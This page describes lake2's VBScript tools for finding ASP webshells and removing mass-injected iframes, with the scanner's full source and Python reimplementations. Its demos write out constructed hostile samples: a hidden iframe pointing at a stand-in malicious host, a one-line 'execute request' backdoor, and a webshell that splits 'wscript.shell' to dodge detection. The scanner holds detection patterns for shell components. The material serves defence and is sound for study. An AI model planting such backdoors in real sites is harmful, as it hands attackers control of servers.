
Lake2 (雷客图) Webmaster Security Assistant, VBS edition (ASP webshell finder)

程序员文章站 2022-04-10 08:01:45
Both scripts are run from the command line.

antiiframe.vbs

# This script is the reverse of the batch iframe-injection tools: it removes, in bulk, malicious code that was appended to files. Open the script in Notepad to edit the pattern parameter, which lists the file names to process separated by | (VBScript regular expressions are also accepted). Because it rewrites files, use it with care and back the files up first.
# Usage: cscript antiiframe.vbs [path to process] [file containing the content to remove]
# Example: cscript antiiframe.vbs d:\web d:\lake2.txt
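The page does not include the source of antiiframe.vbs. What follows is an added example, not the tool's own code, that implements the behaviour described above in Python rather than VBScript so it runs on any platform: walk a directory, select files whose name matches the | separated pattern (treated as a regular expression), strip every occurrence of the payload read from a text file, and write a .bak copy before touching anything. The site layout, file names and the injected iframe are constructed for the demo.

```python
import re
import shutil
import tempfile
from pathlib import Path

# Constructed sample: the snippet a mass-injection tool appended to every page.
INJECTED = b'<iframe src="http://bad.example/m.htm" width="0" height="0"></iframe>'


def load_payload(path):
    """Read the file holding the code to strip. The trailing CR/LF that an
    editor adds is dropped; left in, the payload would never match."""
    return Path(path).read_bytes().rstrip(b"\r\n")


def remove_injected_code(root, payload, pattern, backup_suffix=".bak"):
    """Delete every occurrence of `payload` from files under `root` whose name
    fully matches `pattern` (alternatives separated by |, regex allowed, as the
    page describes for antiiframe.vbs). Each file is copied to <name>.bak
    before it is rewritten. Returns the cleaned files as posix relative paths."""
    name_rx = re.compile(pattern, re.I)
    root = Path(root)
    cleaned = []
    # sorted() materialises the listing first, so the .bak copies written
    # during the loop are never picked up as candidates
    for path in sorted(root.rglob("*")):
        if not path.is_file() or not name_rx.fullmatch(path.name):
            continue
        data = path.read_bytes()   # bytes: no charset guessing, line endings untouched
        if payload not in data:
            continue
        shutil.copy2(path, path.with_name(path.name + backup_suffix))
        path.write_bytes(data.replace(payload, b""))
        cleaned.append(path.relative_to(root).as_posix())
    return cleaned


def demo():
    """Build a constructed site in a temp dir, clean it and report the outcome."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "sub").mkdir()
        (root / "index.htm").write_bytes(b"<html><body>hi</body></html>\r\n" + INJECTED)
        (root / "sub" / "default.asp").write_bytes(b"<% =now() %>" + INJECTED + b"\r\n")
        (root / "logo.jpg").write_bytes(b"\xff\xd8" + INJECTED)   # name not in pattern: left alone
        (root / "lake2.txt").write_bytes(INJECTED + b"\r\n")       # the payload file
        cleaned = remove_injected_code(
            root, load_payload(root / "lake2.txt"), r".*\.htm|.*\.asp")
        return {
            "cleaned": cleaned,
            "index_clean": INJECTED not in (root / "index.htm").read_bytes(),
            "backup_kept": (root / "index.htm.bak").read_bytes().endswith(INJECTED),
            "jpg_untouched": INJECTED in (root / "logo.jpg").read_bytes(),
        }


if __name__ == "__main__":
    print(demo())
```

A plain list such as `index.htm|default.asp` works as the pattern too, since each alternative is matched as a regular expression against the whole file name. Working on bytes rather than decoded text matters for mixed gb2312 and UTF-8 sites: nothing is re-encoded, so a file that did not contain the payload is never rewritten at all.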
----------------------------
scan.vbs

# This script scans for ASP webshells on the local disk and is much faster than the ASP version. False positives and false negatives are possible; treat the report as a list of places to inspect rather than a verdict. The checks are plain substring and regular-expression matches on the lower-cased file text, so a shell that assembles a component name at run time (for example "wscr"&"ipt.shell") is not caught by the component rules; the broader rules (eval, execute, set xxx=server, .run, .exec) are what flag such files. Note also that the generated report contains a `<script src=http://www.0x54.org/announce.js>` tag, so opening it in a browser fetches a script from the author's site; remove that line from writetofile's template if reports must stay offline.
# Usage: cscript scan.vbs [path to scan] [path of the html report]
# Example: cscript scan.vbs d:\web f:\my\report.html

scan.vbs source:

'-----------------------
'scan asp webshell in vbs
'author: lake2 (http://lake2.0x54.org)
'date: 2007-7-29
'version: 1.1
'-----------------------

' comma-separated, lower-case list of extensions the directory walk scans;
' "*" scans every file. Files with other extensions are only examined when a
' scanned file pulls them in via #include, server.execute/transfer or a
' <script runat=server src=...> tag (see scanfile).
dimfileext = "asp,cer,asa,cdx"
' report: table rows collected so far; report2: the finished html page;
' sun: number of findings; sumfiles/sumfolders: what was examined;
' scanned: paths already scanned (prevents double scans and include loops)
dim report, report2, sun, sumfiles, sumfolders, scanned
set scanned = createobject("scripting.dictionary")

' Signatures below are written as "wscr"&domybest&"ipt.shell" on purpose:
' domybest and jj are never assigned (they are Empty), so the concatenation
' yields the real string at run time while the literal signature never
' appears in this script's own source, and the scanner cannot flag itself.

call showinfo()
if wscript.arguments.count = 2 then
    sun = 0
    sumfiles = 0
    sumfolders = 1
    ' drop one trailing backslash so that path & "\" & name stays well formed
    if right(wscript.arguments.item(0),1) = "\" then
        thepath = mid(wscript.arguments.item(0),1,len(wscript.arguments.item(0))-1)
    else
        thepath = wscript.arguments.item(0)
    end if
    call checkarg(thepath)
    wscript.echo "Scanning, please wait..."
    wscript.sleep(1000)
    starttime = now()
    call showallfile(thepath)
    endtime = now()
    wscript.echo vbcrlf & "Scan finished!" & vbcrlf
    report2 = report2 & "<html><head><title>Lake2 asp webmaster security assistant (vbs edition) scan report</title>"
    report2 = report2 & "<meta http-equiv=""content-type"" content=""text/html; charset=gb2312""></head>"
    report2 = report2 & "<body><b><font size=4>Lake2 asp webmaster security assistant (vbs edition) scan report</font></b><br><br>"
    report2 = report2 & "<font size=2>start time: "&starttime&"</font><br>"
    report2 = report2 & "<font size=2>end time: "&endtime&"</font><br>"
    report2 = report2 & "<font size=2>scan complete: <font color=""#ff0000"">"&sumfolders&"</font> folders and <font color=""#ff0000"">"&sumfiles&"</font> files checked, <font color=""#ff0000"">"&sun&"</font> suspicious points found (<font color=""#ff0000"">red</font> entries are highly suspicious)</font><br/>"
    report2 = report2 & "<table width=""100%"" border=""1"" bordercolor=""blue"" style=""padding:5px;line-height:170%;clear:both;font-size:12px;word-break:break-all"">"
    report2 = report2 & "<tr>"
    report2 = report2 & "<td width=""20%"">file path</td>"
    report2 = report2 & "<td width=""20%"">signature</td>"
    report2 = report2 & "<td width=""40%"">description</td>"
    report2 = report2 & "<td width=""20%"">created / modified</td>"
    report2 = report2 & "</tr>"
    report2 = report2 & report
    ' the next line loads a script from the author's site every time the
    ' report is opened in a browser; delete it if the report must stay offline
    report2 = report2 & "</table><hr><script src=http://www.0x54.org/announce.js></script>"
    report2 = report2 & "<div align=center>powered by <a href=""http://www.0x54.org"" target=_blank>0x54.org</a></div>"
    report2 = report2 & "</body></html>"
    call writetofile()
else
    call showhelp()
end if

sub showinfo()
    helpstr = helpstr & "==============================" & vbcrlf
    helpstr = helpstr & "===== Lake2 asp webmaster security assistant, vbs edition =====" & vbcrlf
    helpstr = helpstr & "===== asp webshell check =====" & vbcrlf
    helpstr = helpstr & "===== author: lake2 =====" & vbcrlf
    helpstr = helpstr & "===== email: lake2@mail.csdn.net =====" & vbcrlf
    helpstr = helpstr & "===== visit www.0x54.org for more information =====" & vbcrlf
    helpstr = helpstr & "==============================" & vbcrlf
    helpstr = helpstr & vbcrlf
    wscript.echo helpstr
end sub

sub showhelp()
    helpstr = helpstr & "#usage: cscript scan.vbs [path to scan] [path of the html report]" & vbcrlf
    helpstr = helpstr & "#example: cscript scan.vbs d:\web f:\my\report.html" & vbcrlf
    helpstr = helpstr & vbcrlf
    wscript.echo helpstr
end sub

'make sure both the scan path and the report's directory exist before starting
sub checkarg(arg)
    tmppath = arg
    ' directory part of the report path; a bare file name means the current directory
    if instrrev(wscript.arguments.item(1), "\") > 0 then
        tmppath2 = left(wscript.arguments.item(1), instrrev(wscript.arguments.item(1), "\") - 1)
    else
        tmppath2 = "."
    end if
    set objfso = wscript.createobject("scripting.filesystemobject")
    if not objfso.folderexists(tmppath2) then
        wscript.echo "error: bad path """ & tmppath2 & """!"
        wscript.quit
    elseif not objfso.folderexists(tmppath) then
        wscript.echo "error: bad path """ & tmppath & """!"
        wscript.quit
    end if
    set objfso = nothing
end sub

'walk path and its subdirectories, scanning every file with a listed extension
sub showallfile(path)
    wscript.echo "Checking directory " & path
    set fso = createobject("scripting.filesystemobject")
    set f = fso.getfolder(path)
    for each myfile in f.files
        if checkext(fso.getextensionname(myfile.name)) then
            call scanfile(path & "\" & myfile.name, "")
            sumfiles = sumfiles + 1
        end if
    next
    for each f1 in f.subfolders
        showallfile path & "\" & f1.name
        sumfolders = sumfolders + 1
    next
    set fso = nothing
end sub

'true when the extension is in dimfileext (or dimfileext is "*")
function checkext(fileext)
    checkext = false
    if dimfileext = "*" then
        checkext = true
        exit function
    end if
    ext = split(dimfileext, ",")
    for i = 0 to ubound(ext)
        if lcase(fileext) = ext(i) then
            checkext = true
            exit function
        end if
    next
end function

'append one finding row to the report and bump the counter
sub addrow(filepath, sig, desc, infiles)
    report = report & "<tr><td>" & filepath & "</td><td>" & sig & "</td><td>" & desc & infiles & "</td><td>" & getdatecreate(filepath) & "<br>" & getdatemodify(filepath) & "</td></tr>"
    sun = sun + 1
end sub

'scan one file. infile is the file that pulled it in (empty for files found
'by the directory walk); findings in such a file are marked accordingly
sub scanfile(filepath, infile)
    ' each path is scanned once; this also stops include cycles (a.inc <-> b.inc)
    if scanned.exists(lcase(filepath)) then exit sub
    scanned.add lcase(filepath), 1
    infiles = ""
    if infile <> "" then
        infiles = "<font color=red>this file is included and executed by " & infile & "</font>"
    end if
    on error resume next
    ' load as binary (type 1) so that any readable file loads, then re-read it
    ' as gb2312 text; a file that cannot be loaded is skipped silently
    set tstream = wscript.createobject("adodb.stream")
    tstream.type = 1
    tstream.mode = 3
    tstream.open
    tstream.position = 0
    tstream.loadfromfile filepath
    if err.number <> 0 then exit sub
    tstream.type = 2
    tstream.charset = "gb2312"
    filetxt = ""
    do until tstream.eos
        ' lower-case for case-insensitive matching; drop nul bytes so a
        ' signature padded with nuls is still found
        filetxt = filetxt & lcase(replace(tstream.readtext(102400), chr(0), ""))
    loop
    tstream.close()
    set tstream = nothing

    set fsos = wscript.createobject("scripting.filesystemobject")
    if len(filetxt) > 0 then
        ' a leading newline lets \b and [^.] match at the very start of the file
        filetxt = vbcrlf & filetxt

        'dangerous components, by progid or clsid (plain substring search)
        if instr(filetxt, lcase("wscr"&domybest&"ipt.shell")) > 0 or instr(filetxt, lcase("clsid:72c24dd5-d70a"&domybest&"-438b-8a42-98424b88afb8")) > 0 then
            call addrow(filepath, "wscr"&domybest&"ipt.shell or clsid:72c24dd5-d70a"&domybest&"-438b-8a42-98424b88afb8", "<font color=red>dangerous component, commonly used by asp webshells</font>", infiles)
        end if
        if instr(filetxt, lcase("she"&domybest&"ll.application")) > 0 or instr(filetxt, lcase("clsid:13709620-c27"&domybest&"9-11ce-a49e-444553540000")) > 0 then
            call addrow(filepath, "she"&domybest&"ll.application or clsid:13709620-c27"&domybest&"9-11ce-a49e-444553540000", "<font color=red>dangerous component, commonly used by asp webshells</font>", infiles)
        end if

        set regex = new regexp
        regex.ignorecase = true
        regex.global = true
        'script encoder: ordinary asp pages are not encoded
        regex.pattern = "\blanguage\s*=\s*[""]?\s*(vbscript|jscript|javascript)\.encode\b"
        if regex.test(filetxt) then
            call addrow(filepath, "(vbscript|jscript|javascript).encode", "<font color=red>the script appears to be encoded; normal asp files are not</font>", infiles)
        end if
        'eval backdoor
        regex.pattern = "\bev"&"al\b"
        if regex.test(filetxt) then
            call addrow(filepath, "ev"&"al", "e"&"val() can run arbitrary asp code and is used by some backdoors, usually as ev"&"al(x)<br>it is also legitimate in javascript, so this may be a false positive.", infiles)
        end if
        'execute / executeglobal backdoor ([^.] keeps the server.execute method out of this rule)
        regex.pattern = "[^.]\bexe"&"cute(global)?\b"
        if regex.test(filetxt) then
            call addrow(filepath, "exec"&"ute() or exe"&"cuteglobal()", "<font color=red>this function can run arbitrary asp code and is used by some backdoors, usually as ex"&"ecute(x)</font><br>", infiles)
        end if
        'msscriptcontrol.scriptcontrol
        regex.pattern = "\.execu"&"testatement\b"
        if regex.test(filetxt) then
            call addrow(filepath, ".exec"&"utestatement", "<font color=red>found the .execut"&"estatement method of msscriptcontrol.scriptcontrol</font><br>", infiles)
        end if
        'fso file read/write
        regex.pattern = "\.(open|create)textfile\b"
        if regex.test(filetxt) then
            call addrow(filepath, ".crea"&"tetextfile|.o"&"pentextfile", "uses the fso createtextfile|opentextfile methods to read or write files", infiles)
        end if
        'adodb.stream / jmail savetofile
        regex.pattern = "\.savet"&"ofile\b"
        if regex.test(filetxt) then
            call addrow(filepath, ".sa"&"vetofile", "uses the savetofile method of stream or jmail to write a file", infiles)
        end if
        '.save / .saveas
        regex.pattern = "\.sa"&"ve(as)?\b"
        if regex.test(filetxt) then
            call addrow(filepath, ".sa"&"ve or .sa"&"veas", "uses the save or saveas method to write a file", infiles)
        end if
        'set xxx = server (followed by whitespace): the object may later be used for .execute
        regex.pattern = "set\s*.*\s*=\s*server\s"
        if regex.test(filetxt) then
            call addrow(filepath, "set xxx=se"&"rver", "<font color=red>found set xxx=ser" & jj & "ver; check whether .execute is called on it</font><br>", infiles)
        end if
        'server.execute / server.transfer with a non-literal argument cannot be followed
        regex.pattern = "server\.(ex"&"ecute|transfer)([ \t]*|\()[^""]\)"
        if regex.test(filetxt) then
            call addrow(filepath, "server.ex"&"ecute", "<font color=red>cannot follow the file run by server.e"&"xecute(); please inspect it manually</font><br>", infiles)
        end if
        'wscript.shell .run / .exec
        regex.pattern = "\.r"&"un\b"
        if regex.test(filetxt) then
            call addrow(filepath, ".ru"&"n", "<font color=red>found the run method of wscript.shell</font><br>", infiles)
        end if
        regex.pattern = "\.ex"&"ec\b"
        if regex.test(filetxt) then
            call addrow(filepath, ".ex"&"ec", "<font color=red>found the exec method of wscript.shell</font><br>", infiles)
        end if
        'shell.application .shellexecute
        regex.pattern = "\.shel"&"lexecute\b"
        if regex.test(filetxt) then
            call addrow(filepath, ".shelle"&"xecute", "<font color=red>found the shellexecute method of shell.application</font><br>", infiles)
        end if
        '.create
        regex.pattern = "\.cre"&"ate\b"
        if regex.test(filetxt) then
            call addrow(filepath, ".crea"&"te", "found a create method<br>", infiles)
        end if
        set regex = nothing

        'follow <!--#include file|virtual=...--> targets. Files whose extension is
        'in dimfileext are reached by the directory walk anyway; other extensions
        '(.inc, .txt, ...) would otherwise never be scanned. Both file= and
        'virtual= are resolved relative to the including file's directory, not
        'the site root, which is a known limitation of this scanner.
        set regex = new regexp
        regex.ignorecase = true
        regex.global = true
        regex.pattern = "<!--\s*#include\s+(file|virtual)\s*=\s*.*?-->"
        set matches = regex.execute(filetxt)
        for each match in matches
            'text after "=" up to the closing ">", with "/" normalised to "\"
            tfile = replace(trim(mid(match.value, instr(match.value, "=") + 1, len(match.value) - instr(match.value, "=") - 1)), "/", "\")
            if left(tfile, 1) = "'" then
                tfile = mid(tfile, 2, instr(2, tfile, "'", 1) - 2)
            elseif left(tfile, 1) = """" then
                tfile = mid(tfile, 2, instr(2, tfile, """", 1) - 2)
            else
                'unquoted name: cut at the "--" of "-->" first, then at the first blank
                tfile = replace(tfile, chr(9), " ")
                if instr(tfile, "--") > 0 then tfile = left(tfile, instr(tfile, "--") - 1)
                tfile = trim(tfile)
                if instr(tfile, " ") > 0 then tfile = left(tfile, instr(tfile, " ") - 1)
            end if
            if not checkext(fsos.getextensionname(tfile)) then
                call scanfile(mid(filepath, 1, instrrev(filepath, "\")) & tfile, filepath)
                sumfiles = sumfiles + 1
            end if
        next
        set matches = nothing
        set regex = nothing

        'follow server.execute("x") / server.transfer("x") with a quoted literal
        set regex = new regexp
        regex.ignorecase = true
        regex.global = true
        regex.pattern = "server\.(exec"&"ute|transfer)([ \t]*|\()"".*?"""
        set matches = regex.execute(filetxt)
        for each match in matches
            tfile = replace(mid(match.value, instr(match.value, """") + 1, len(match.value) - instr(match.value, """") - 1), "/", "\")
            if not checkext(fsos.getextensionname(tfile)) then
                call scanfile(mid(filepath, 1, instrrev(filepath, "\")) & tfile, filepath)
                sumfiles = sumfiles + 1
            end if
        next
        set matches = nothing
        set regex = nothing

        'follow <script runat=server src=...> tags
        set xregex = new regexp
        xregex.ignorecase = true
        xregex.global = true
        xregex.pattern = "<scr"&"ipt\s*(.|\n)*?runat\s*=\s*""?server""?(.|\n)*?>"
        set xmatches = xregex.execute(filetxt)
        for each match in xmatches
            tmplake2 = mid(match.value, 1, instr(match.value, ">"))
            srcseek = instr(1, tmplake2, "src", 1)
            if srcseek > 0 then
                srcseek2 = instr(srcseek, tmplake2, "=")
                'skip blanks after "src="
                for i = 1 to 50
                    tmp = mid(tmplake2, srcseek2 + i, 1)
                    if tmp <> " " and tmp <> chr(9) and tmp <> vbcrlf then
                        exit for
                    end if
                next
                if tmp = """" then
                    tmpname = mid(tmplake2, srcseek2 + i + 1, instr(srcseek2 + i + 1, tmplake2, """") - srcseek2 - i - 1)
                else
                    'unquoted value: ends at the first blank, tab, line break or ">"
                    if instr(srcseek2 + i + 1, tmplake2, " ") > 0 then tmpname = mid(tmplake2, srcseek2 + i, instr(srcseek2 + i + 1, tmplake2, " ") - srcseek2 - i) else tmpname = mid(tmplake2, srcseek2 + i)
                    if instr(tmpname, chr(9)) > 0 then tmpname = mid(tmpname, 1, instr(1, tmpname, chr(9)) - 1)
                    if instr(tmpname, vbcrlf) > 0 then tmpname = mid(tmpname, 1, instr(1, tmpname, vbcrlf) - 1)
                    if instr(tmpname, ">") > 0 then tmpname = mid(tmpname, 1, instr(1, tmpname, ">") - 1)
                end if
                call scanfile(mid(filepath, 1, instrrev(filepath, "\")) & replace(tmpname, "/", "\"), filepath)
                sumfiles = sumfiles + 1
            end if
        next
        set xmatches = nothing
        set xregex = nothing

    end if
    set fsos = nothing
end sub

function getdatemodify(filepath)
    set fso = createobject("scripting.filesystemobject")
    set f = fso.getfile(filepath)
    s = f.datelastmodified
    set f = nothing
    set fso = nothing
    getdatemodify = s
end function

function getdatecreate(filepath)
    set fso = createobject("scripting.filesystemobject")
    set f = fso.getfile(filepath)
    s = f.datecreated
    set f = nothing
    set fso = nothing
    getdatecreate = s
end function

'write the finished html report (2 = ForWriting, true = create if missing)
sub writetofile()
    set fso = createobject("scripting.filesystemobject")
    set thefile = fso.opentextfile(wscript.arguments.item(1), 2, true)
    thefile.write(report2)
    thefile.close
    set fso = nothing
    wscript.echo "Scan results written to """ & wscript.arguments.item(1) & """, please review it."
end sub
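To make the detection logic above easy to exercise without a Windows host, here is an added example (my own code, not part of lake2's tool) that transcribes the scan.vbs rules into Python: it lower-cases the text, drops NUL bytes, prepends a newline so `\b` and `[^.]` can match at offset 0, runs the same substring and regex checks, and follows `#include` targets whose extension is not in the scan list, exactly as scanfile does. It also adds one step the VBS script lacks, folding `"wscr"&"ipt.shell"` back into `wscript.shell`, to show how a split string literal slips past the component rules. The sample site, file names and the three pages are constructed for the demo; the rule names are mine.

```python
import re
import tempfile
from pathlib import Path

# Extensions the directory walk scans (the scan.vbs default list).
SCAN_EXTS = {"asp", "cer", "asa", "cdx"}

# The scan.vbs rules, transcribed as Python regexes over the lower-cased text.
SIGNATURES = [(name, re.compile(rx)) for name, rx in [
    ("wscript.shell", r"wscript\.shell|clsid:72c24dd5-d70a-438b-8a42-98424b88afb8"),
    ("shell.application", r"shell\.application|clsid:13709620-c279-11ce-a49e-444553540000"),
    ("script.encode", r"\blanguage\s*=\s*[\"']?\s*(vbscript|jscript|javascript)\.encode\b"),
    ("eval", r"\beval\b"),
    ("execute", r"[^.]\bexecute(global)?\b"),
    ("executestatement", r"\.executestatement\b"),
    ("textfile", r"\.(open|create)textfile\b"),
    ("savetofile", r"\.savetofile\b"),
    ("save", r"\.save(as)?\b"),
    ("set-server", r"set\s*.*\s*=\s*server\s"),
    ("run", r"\.run\b"),
    ("exec", r"\.exec\b"),
    ("shellexecute", r"\.shellexecute\b"),
    ("create", r"\.create\b"),
]]

INCLUDE_RE = re.compile(
    r"<!--\s*#include\s+(?:file|virtual)\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def join_split_literals(text):
    """Fold "wscr" & "ipt.shell" back into "wscript.shell".

    scan.vbs matches the raw text, so a shell that splits a component name
    across concatenated string literals slips past its component rules.
    """
    return re.sub(r'"\s*&\s*"', "", text)


def scan_text(text, fold_literals=True):
    """Return the names of the rules that fire on one file's contents."""
    text = text.replace("\0", "").lower()   # scan.vbs drops NULs and lower-cases
    if fold_literals:
        text = join_split_literals(text)
    text = "\n" + text                      # lets [^.] and \b match at offset 0
    return [name for name, rx in SIGNATURES if rx.search(text)]


def scan_tree(root):
    """Scan every file under root with a listed extension, follow #include
    targets whose extension is *not* listed (so .inc files are not skipped),
    and return {posix relative path: [rule names]} for files with hits."""
    root = Path(root).resolve()
    queue = [p for p in root.rglob("*")
             if p.is_file() and p.suffix.lstrip(".").lower() in SCAN_EXTS]
    seen, findings = set(), {}
    while queue:
        path = queue.pop().resolve()
        if path in seen:                    # also stops a.inc <-> b.inc include loops
            continue
        seen.add(path)
        try:
            text = path.read_text(encoding="gb2312", errors="replace")
        except OSError:
            continue
        hits = scan_text(text)
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
        for m in INCLUDE_RE.finditer(text):
            # as in scan.vbs, file= and virtual= are both taken relative to
            # the including file's directory
            target = path.parent / m.group(1).replace("\\", "/")
            if target.is_file() and target.suffix.lstrip(".").lower() not in SCAN_EXTS:
                queue.append(target)
    return findings


def demo():
    """Build a small constructed site in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "inc").mkdir()
        # clean page that pulls in a non-.asp include
        (root / "index.asp").write_text(
            '<!--#include file="inc/config.inc"-->\n'
            '<%\nSet conn = Server.CreateObject("ADODB.Connection")\n%>\n',
            encoding="gb2312")
        # the include hides a one-line backdoor
        (root / "inc" / "config.inc").write_text(
            '<% execute request("pass") %>\n', encoding="gb2312")
        # a shell that splits the progid to dodge substring matching
        (root / "shell.asp").write_text(
            '<% Set o = Server.CreateObject("wscr"&"ipt.shell")\n'
            'o.run request("c") %>\n', encoding="gb2312")
        return scan_tree(root)


if __name__ == "__main__":
    for path, rules in sorted(demo().items()):
        print(f"{path}: {', '.join(rules)}")
```

Running it shows the two sides of the page's own caveat: index.asp produces no finding, config.inc is reached only because the include is followed, and shell.asp is flagged by the `.run` rule even without folding, while the `wscript.shell` component rule fires only once the split literal is joined. The rules keep the same false-positive profile as scan.vbs (`\beval\b` fires on client-side JavaScript too), which is why the page says to treat the report as a list of places to look.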


Because there is quite a lot of code, it has been packaged for everyone to download and study.